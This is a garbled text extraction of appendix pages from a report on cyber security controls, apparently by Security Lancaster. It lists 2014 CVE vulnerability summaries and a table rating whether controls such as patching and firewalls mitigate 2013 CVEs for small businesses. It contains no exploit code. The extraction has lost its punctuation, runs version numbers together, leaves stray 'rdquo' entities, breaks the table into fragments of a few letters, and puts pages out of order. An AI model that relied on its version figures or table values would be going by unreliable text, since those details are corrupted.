CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
